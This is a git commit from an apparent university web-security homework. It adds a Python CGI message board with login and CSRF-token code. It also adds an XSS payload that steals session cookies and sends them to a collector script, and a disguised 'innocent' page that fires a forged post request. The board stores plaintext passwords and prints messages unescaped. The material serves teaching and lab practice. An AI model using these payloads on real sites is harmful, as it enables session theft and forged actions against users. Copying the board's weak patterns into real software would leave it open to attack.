summaryrefslogtreecommitdiff
path: root/hw4
diff options
context:
space:
mode:
author53hornet <53hornet@gmail.com>2019-02-02 23:10:20 -0500
committer53hornet <53hornet@gmail.com>2019-02-02 23:10:20 -0500
commit24cd8bc11345395f1a0bb64d61e51e207d8b3ace (patch)
treeef8242cda1175c11dd4a565e1ba16cb531c11c47 /hw4
downloadcsci454-master.tar.xz
csci454-master.zip
Diffstat (limited to 'hw4')
-rw-r--r--hw4/.gitignore3
-rw-r--r--hw4/cat.jpgbin0 -> 50325 bytes
-rwxr-xr-xhw4/cgi-bin/._board.pybin0 -> 355 bytes
-rwxr-xr-xhw4/cgi-bin/._login.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._logout.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._output.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._post.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/._steal_session.pybin0 -> 299 bytes
-rwxr-xr-xhw4/cgi-bin/board.py21
-rwxr-xr-xhw4/cgi-bin/login.py39
-rwxr-xr-xhw4/cgi-bin/logout.py23
-rwxr-xr-xhw4/cgi-bin/output.py97
-rwxr-xr-xhw4/cgi-bin/post.py39
-rwxr-xr-xhw4/cgi-bin/steal_session.py24
-rw-r--r--hw4/csrf.html14
-rw-r--r--hw4/index.html1
-rw-r--r--hw4/messages4
-rw-r--r--hw4/sessions0
-rw-r--r--hw4/simple-xss.txt1
-rw-r--r--hw4/stolen_sessions0
-rw-r--r--hw4/users2
21 files changed, 268 insertions, 0 deletions
diff --git a/hw4/.gitignore b/hw4/.gitignore
new file mode 100644
index 0000000..8a80dbd
--- /dev/null
+++ b/hw4/.gitignore
@@ -0,0 +1,3 @@
+*.pyc
+*.log
+
diff --git a/hw4/cat.jpg b/hw4/cat.jpg
new file mode 100644
index 0000000..1890aa8
--- /dev/null
+++ b/hw4/cat.jpg
Binary files differ
diff --git a/hw4/cgi-bin/._board.py b/hw4/cgi-bin/._board.py
new file mode 100755
index 0000000..ef20daa
--- /dev/null
+++ b/hw4/cgi-bin/._board.py
Binary files differ
diff --git a/hw4/cgi-bin/._login.py b/hw4/cgi-bin/._login.py
new file mode 100755
index 0000000..26100f6
--- /dev/null
+++ b/hw4/cgi-bin/._login.py
Binary files differ
diff --git a/hw4/cgi-bin/._logout.py b/hw4/cgi-bin/._logout.py
new file mode 100755
index 0000000..9d1f260
--- /dev/null
+++ b/hw4/cgi-bin/._logout.py
Binary files differ
diff --git a/hw4/cgi-bin/._output.py b/hw4/cgi-bin/._output.py
new file mode 100755
index 0000000..25267ab
--- /dev/null
+++ b/hw4/cgi-bin/._output.py
Binary files differ
diff --git a/hw4/cgi-bin/._post.py b/hw4/cgi-bin/._post.py
new file mode 100755
index 0000000..fc9cd5d
--- /dev/null
+++ b/hw4/cgi-bin/._post.py
Binary files differ
diff --git a/hw4/cgi-bin/._steal_session.py b/hw4/cgi-bin/._steal_session.py
new file mode 100755
index 0000000..69e619e
--- /dev/null
+++ b/hw4/cgi-bin/._steal_session.py
Binary files differ
diff --git a/hw4/cgi-bin/board.py b/hw4/cgi-bin/board.py
new file mode 100755
index 0000000..5ca8afc
--- /dev/null
+++ b/hw4/cgi-bin/board.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+from output import *
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET datas
+
+if not Login():
+ DisplayLogin()
+
+# if we get here, this is an authorized user, let's print the messages
+PrintMessages()
+
+exit(0)
diff --git a/hw4/cgi-bin/login.py b/hw4/cgi-bin/login.py
new file mode 100755
index 0000000..a308dde
--- /dev/null
+++ b/hw4/cgi-bin/login.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+import random
+
+from output import *
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies
+form = cgi.FieldStorage() # for reading GET data
+
+login = form.getvalue('username')
+password = form.getvalue('password')
+with open('users', 'r') as users:
+ s = users.read()
+ if s.find(login + ' ' + password) == -1:
+ ShowError()
+
+ # else set session id cookie and store it in the file!
+ s_id = uuid.uuid4().hex
+ cookie['session_id'] = s_id # login
+
+ # xss protection -- set session_id cookie to httpOnly
+ cookie['session_id']['httponly'] = '1'
+
+ with open("sessions", "a") as myfile:
+ # csrf protection -- session token construction
+ random.seed()
+ csrfToken = str(random.random())
+ myfile.write(s_id + ' ' + login + ' ' + csrfToken + '\n')
+
+ print cookie
+
+RedirectToBoard()
diff --git a/hw4/cgi-bin/logout.py b/hw4/cgi-bin/logout.py
new file mode 100755
index 0000000..9d64800
--- /dev/null
+++ b/hw4/cgi-bin/logout.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET data
+
+message = form.getvalue('message')
+
+user = Login()
+if not user:
+ ShowError()
+ exit(0)
+
+RemoveAllUserSessions(user)
+RedirectToBoard()
diff --git a/hw4/cgi-bin/output.py b/hw4/cgi-bin/output.py
new file mode 100755
index 0000000..544ac60
--- /dev/null
+++ b/hw4/cgi-bin/output.py
@@ -0,0 +1,97 @@
+import os
+import re
+
+def DisplayLogin():
+ print 'Content-Type: text/html\n'
+ print '<html><body>'
+ print """
+ <div id="container">
+ <form action="login.py" method="get">
+ <label for="username">Username:</label>
+ <input type="text" id="username" name="username">
+ <label for="password">Password:</label>
+ <input type="password" id="password" name="password">
+ <div id="lower">
+ <input type="submit" value="Login">
+ </div><!--/ lower-->
+ </form>
+ </div>
+ """
+ print '</body></html>'
+ exit(0)
+
+def PrintMessages():
+ print 'Content-Type: text/html\n'
+ print '<html><body>'
+
+ with open("messages", "r") as m_file:
+ s = m_file.read()
+ l = s.split('\n')
+ for i in l:
+ if len(i) == 0:
+ continue
+ i.replace('\\n','\n')
+ print i
+ print '<br><br>'
+ print """
+ <br><br>
+ <form action="post.py" method="post" style="display:inline">
+ <input type="hidden" name="csrfToken" value="""
+
+ # csrf protection -- session token sendoff
+ s_id = os.environ.get('HTTP_COOKIE').split('=')[1] # for reading cookies
+
+ with open('sessions', 'r') as s_file:
+ for line in s_file:
+ if s_id in line:
+ print line.split()[2]
+
+ print """
+ <label for="message">Message:</label><br>
+ <textarea rows="4" cols="50" name="message"></textarea>
+ <br>
+ <input type="submit" value="Post"></form>
+ """
+ print """
+ <form action="logout.py" style="display:inline">
+ <input type="submit" value="Logout" />
+ </form>
+ """
+
+ print '</body></html>'
+
+def ShowError():
+ print 'Content-Type: text/html\n'
+ print '<html><body>'
+ print '<h2> Error ocured :P </h2>'
+ print '</body></html>'
+ exit(0)
+
+def Login():
+ cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies
+ g = re.search('session_id=(\w+)', cookie_string) # if g==None -- no cookie
+ if not g:
+ return False
+ with open('sessions', 'r') as s_file:
+ s = s_file.read()
+ sid = g.group(1)
+ g = re.search(sid + ' ' + '(\w+)', s)
+ if not g:
+ return False
+ return g.group(1)
+
+def RedirectToBoard():
+ #go back to board.py
+ print 'Content-Type: text/html\n'
+ print '<meta http-equiv="refresh" content="0; url=board.py" />'
+ exit(0)
+
+def RemoveAllUserSessions(user):
+ tmp = ''
+ f = open('sessions', 'r')
+ for line in f:
+ if user not in line:
+ tmp += line
+ f.close()
+ with open('sessions','w') as f:
+ f.write(tmp)
diff --git a/hw4/cgi-bin/post.py b/hw4/cgi-bin/post.py
new file mode 100755
index 0000000..2a0bf8c
--- /dev/null
+++ b/hw4/cgi-bin/post.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() # allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading POST data
+
+message = form.getvalue('message')
+
+user = Login()
+if not user:
+ ShowError()
+
+if message == None: # to prevent posting empty messages
+ RedirectToBoard()
+
+# csrf protection -- check for csrfToken
+csrfToken = form.getvalue('csrfToken')
+
+if csrfToken is None:
+ ShowError()
+
+with open('sessions', 'r') as s_file:
+ for line in s_file:
+ if user in line and not csrfToken in line:
+ ShowError()
+
+message = message.replace('\n','\n')
+with open('messages','a') as m:
+ m.write(user + ': ' + message + '\n')
+
+RedirectToBoard()
diff --git a/hw4/cgi-bin/steal_session.py b/hw4/cgi-bin/steal_session.py
new file mode 100755
index 0000000..df84de6
--- /dev/null
+++ b/hw4/cgi-bin/steal_session.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET data
+
+session = form.getvalue('session')
+
+if session:
+ with open('stolen_sessions','a') as m:
+ m.write(session + '\n')
+
+#Send victim to homepage so they don't notice anything!
+print 'Content-Type: text/html\n'
+print '<html><body><p style="font-size:25px"><img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img> &nbsp; We got your session key &nbsp; <img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img></p></body></html>'
+exit(0)
diff --git a/hw4/csrf.html b/hw4/csrf.html
new file mode 100644
index 0000000..3e8cdae
--- /dev/null
+++ b/hw4/csrf.html
@@ -0,0 +1,14 @@
+<html>
+<title> Innocent page </title>
+<body>
+<h2>This is innocent page, here is a picture of a cute cat: </h2> <br>
+
+<img src="cat.jpg">
+
+<!-- Insert your CSRF attack here. For example you can use another hidden <img> to
+generate an HTTP request to post.py to write something from victim -->
+
+<img src="http://127.0.0.1:8000/cgi-bin/post.py?message=i%20am%20not%20l33t" width="0" height="0" border="0">
+
+</body>
+</html>
diff --git a/hw4/index.html b/hw4/index.html
new file mode 100644
index 0000000..74c862d
--- /dev/null
+++ b/hw4/index.html
@@ -0,0 +1 @@
+<meta http-equiv="refresh" content="0; url=cgi-bin/board.py" />
diff --git a/hw4/messages b/hw4/messages
new file mode 100644
index 0000000..5a94cc2
--- /dev/null
+++ b/hw4/messages
@@ -0,0 +1,4 @@
+user: The weather is nice today
+user: This site seems secure
+hacker: I wouldn't be so sure about that...
+user: Lol
diff --git a/hw4/sessions b/hw4/sessions
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/hw4/sessions
diff --git a/hw4/simple-xss.txt b/hw4/simple-xss.txt
new file mode 100644
index 0000000..1862081
--- /dev/null
+++ b/hw4/simple-xss.txt
@@ -0,0 +1 @@
+<script> var tmp = '<iframe src="http://127.0.0.1:8000/cgi-bin/steal_session.py?session=' + document.cookie.split('=')[1] + '" frameBorder="0" width="1000" height="90"></iframe>'; document.write(tmp)</script>
diff --git a/hw4/stolen_sessions b/hw4/stolen_sessions
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/hw4/stolen_sessions
diff --git a/hw4/users b/hw4/users
new file mode 100644
index 0000000..7059371
--- /dev/null
+++ b/hw4/users
@@ -0,0 +1,2 @@
+user 1234
+hacker 4321